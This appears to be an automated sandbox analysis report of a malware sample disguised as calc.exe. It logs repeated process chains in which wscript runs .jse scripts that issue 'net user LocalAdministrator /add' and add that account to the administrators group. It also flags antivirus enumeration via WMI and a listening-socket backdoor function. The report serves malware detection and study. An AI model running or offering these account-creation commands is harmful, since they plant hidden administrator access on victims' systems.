Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jjzYgN19ls.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse
Source: calc.exe Binary or memory string: Shell_TrayWnd
Source: calc.exe, 00000000.00000002.1180544526.0000000000401000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \Software\AutoIt v3\AutoItIncludeSendInput0%doffondownupASC 0%d0E051007080900020409ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTShell_TrayWndVirtualFreeExVirtualAllocEx
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\calc.exe Code function: GetLocaleInfoA, 0_2_004558FF
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00454555 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00454555
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0043738E GetUserNameW, 0_2_0043738E
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004527E8 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy, 0_2_004527E8
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary, 0_2_0040EA76
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\calc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Desktop\calc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042F3BC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_0042F3BC
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042F9C7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_0042F9C7
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00430B6B OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_00430B6B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523632 Sample: calc.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 64 105 Machine Learning detection for sample 2->105 107 Sigma detected: Suspicious Calculator Usage 2->107 109 Sigma detected: Suspicious Process Parents 2->109 111 Sigma detected: Rare Remote Thread Creation By Uncommon Source Image 2->111 14 calc.exe 1 2->14         started        16 calc.exe 2 1 2->16         started        19 calc.exe 2->19         started        21 2 other processes 2->21 process3 signatures4 23 wscript.exe 1 14->23         started        103 Adds a new user with administrator rights 16->103 26 wscript.exe 1 1 16->26         started        process5 signatures6 117 Adds a new user with administrator rights 23->117 28 calc.exe 23->28         started        30 net.exe 1 23->30         started        32 net.exe 1 23->32         started        40 2 other processes 23->40 119 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->119 34 net.exe 1 26->34         started        36 net.exe 1 26->36         started        38 calc.exe 26->38         started        process7 process8 42 wscript.exe 28->42         started        45 conhost.exe 30->45         started        47 net1.exe 30->47         started        49 conhost.exe 32->49         started        51 net1.exe 32->51         started        53 net1.exe 1 34->53         started        55 conhost.exe 34->55         started        57 conhost.exe 36->57         started        59 net1.exe 1 36->59         started        signatures9 121 Adds a new user with administrator rights 42->121 61 calc.exe 42->61         started        63 net.exe 42->63         started        65 net.exe 42->65         started        process10 process11 67 wscript.exe 61->67         started        70 conhost.exe 63->70         started        72 net1.exe 63->72         started        74 conhost.exe 65->74         started        76 net1.exe 65->76         started        signatures12 113 Adds a new user with administrator rights 67->113 78 calc.exe 67->78         started        80 net.exe 67->80         started        82 net.exe 67->82         started        process13 process14 84 wscript.exe 78->84         started        87 conhost.exe 80->87         started        89 net1.exe 80->89         started        91 conhost.exe 82->91         started        93 net1.exe 82->93         started        signatures15 115 Adds a new user with administrator rights 84->115 95 calc.exe 84->95         started        97 net.exe 84->97         started        99 net.exe 84->99         started        process16 process17 101 conhost.exe 97->101         started       
No contacted IP infos